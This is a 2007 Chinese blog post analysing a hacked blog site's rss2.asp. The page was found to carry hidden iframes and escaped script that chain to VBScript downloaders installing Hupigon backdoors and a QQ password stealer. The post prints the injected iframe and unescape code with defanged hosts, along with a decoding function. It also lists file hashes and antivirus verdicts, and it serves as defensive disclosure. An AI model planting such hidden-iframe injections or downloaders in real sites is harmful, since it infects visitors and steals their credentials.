03-31/某博客网的rss2.asp力推5病毒(其中3个为灰鸽子)第3版

endurer 原创

2007-03-31 第3版 补充瑞星 的反应
2007-03-29 第2版 补充kaspersky 的反应
2007-03-29 第1

该博客网的rss2.asp包含代码:
/---
<SCRIPT>var Words="%*3*Cht*ml%3E%3Ciframe src%3D%22hxxp%3A%2F%2Fkmx%2E**zl**f*j**j%2Ecom%2Findex%2Ehtm%22 name%3D%22zhu%22 width%3D%220%22 height%3D%220%22 frameborder%3D%220%22%3E%3C%2Fhtml%3E%0D%0A%0D%0A%0D%0A";document.write(unescape(Words))</SCRIPT> <Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/ndex.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe><Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/ndex.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
---/


变量Words的值解密后的内容为:
/---
<html><iframe src="hxxp://k***m**x*.z***l*f**j*j.com/index.htm" name="zhu" width="0" height="0" frameborder="0"></html>
";document.write(unescape(Words))</SCRIPT> <SCRIPT>var Words="<html><iframe src="hxxp://k***m**x*.z***l*f**j*j.com/index.htm" name="zhu" width="0" height="0" frameborder="0"></html>
---/

hxxp://k***m**x*.z***l*f**j*j.com/index.htm包含代码:
/---
<iframe src="hxxp://www.m**h***5**5**.cn/g****z****/g****z****.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://k***m**x*.z***l*f**j*j.com/jb.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.z***l*f**j*j.com/321.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.z***l*f**j*j.com/123.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://www.m**h***5**5**.cn/g****z****/g****z****.htm中的脚本代码功能是用unescape()解码字符串值并输出。

输出内容为VBScript脚本,功能是使用自定义函数:
/---
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
---/
解密变量t的值并执行。

解密后的变量t值为VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 gz.exe,保存为 %temp%/leren.bat,并利用Shell.Application 对象 Q 的 ShellExecute 方法来运行。


文件说明符 : D:/test/gz.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:41:59
修改时间 : 2007-3-29 12:41:59
访问时间 : 2007-3-29 0:0:0
大小 : 387584 字节 378.512 KB
MD5 : 8b1e57e69f958e004fc743188e4f63c4

Kaspersky 报为 Backdoor.Win32.Hupigon.emk[KLAB-1900585]

 瑞星 报为 Backdoor.Gpigeon.sbi(病毒上报邮件分析结果-流水单号:6239851)

    我们将在较新的19.16.42版本(瑞星2006的18.72.42版本)中处理解决,请您届时将您的瑞星软件升级到19.16.42(瑞星2006的18.72.42版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话,我们会推迟一到两版本后升级。

hxxp://k***m**x*.z***l*f**j*j.com/jb.htm(卡巴报为:Trojan-Downloader.VBS.Small.dc)内容为VBScript脚本代码,功能是输出信息:“你好,您所访问的页面正在加载中...请稍候片刻....”,同时利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 jb.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 zhonghuae 的 ShellExecute 方法来运行。


文件说明符 : D:/test/jb.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:39:38
修改时间 : 2007-3-29 12:39:40
访问时间 : 2007-3-29 0:0:0
大小 : 5632 字节 5.512 KB
MD5 : ee5a215b736b733ec2caed16fb413a29

Kaspersky 报为 Trojan.Win32.Agent.aic [KLAB-1900058]

 瑞星 报为 Trojan.Mnless.hpg(病毒上报邮件分析结果-流水单号:6239566)

hxxp://www.z***l*f**j*j.com/321.htm 内容为VBScript脚本代码,功能是输出信息:“你好,您所访问的页面正在加载中...请稍候片刻....”,同时利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 321.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 zhonghuae 的 ShellExecute 方法来运行。

文件说明符 : D:/test/321.exe
属性 : A---
语言 : 英语(美国)
文件版本 : 5.2.3790.1830
说明 : Generic Host Process for Win32 Services
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.2.3790.1830
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : rpcs.exe
源文件名 : rpcs.exe
创建时间 : 2007-3-29 12:39:38
修改时间 : 2007-3-29 12:41:12
访问时间 : 2007-3-29 0:0:0
大小 : 109606 字节 107.38 KB
MD5 : 9adeac121907c9ea7ad2b1dad7834bc6

Kaspersky 报为 Trojan-PSW.Win32.QQRob.km

瑞星 报为 Trojan.PSW.QQRobber.bkv(病毒上报邮件分析结果-流水单号:6239566)


hxxp://www.z***l*f**j*j.com/123.htm 内容为VBScript脚本代码,功能是输出信息:“你好,您所访问的页面正在加载中...请稍候片刻....”,同时利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 123.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 zhonghuae 的 ShellExecute 方法来运行。


文件说明符 : D:/test/123.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:39:38
修改时间 : 2007-3-29 12:43:34
访问时间 : 2007-3-29 0:0:0
大小 : 298121 字节 291.137 KB
MD5 : b6b5bd850c28a1843fc5195fa09d52c7

Kaspersky 报为 Backdoor.Win32.Hupigon.crx[KLAB-1900585]

瑞星 报为 Trojan.Mnless.hpf(病毒上报邮件分析结果-流水单号:6239566)


hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm (瑞星报为:Trojan.DL.VBS.Agent.clg)内容为JavaScript脚本代码,功能是用String.fromCharCode()解码变量t的值并输出。

解码后的变量t的值为VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 010.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 Xe 的 ShellExecute 方法来运行。

文件说明符 : d:/test/010.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:35:2
修改时间 : 2007-3-29 12:35:6
访问时间 : 2007-3-29 0:0:0
大小 : 413184 字节 403.512 KB
MD5 : 8181fd58e26227d57915fa25ce26234e 

Kaspersky 报为 Backdoor.Win32.Hupigon.avg[KLAB-1900585]

瑞星 报为 Backdoor.Gpigeon.sbg(病毒上报邮件分析结果-流水单号:6239423)

你可能感兴趣的:(03-31/某博客网的rss2.asp力推5病毒(其中3个为灰鸽子)第3版)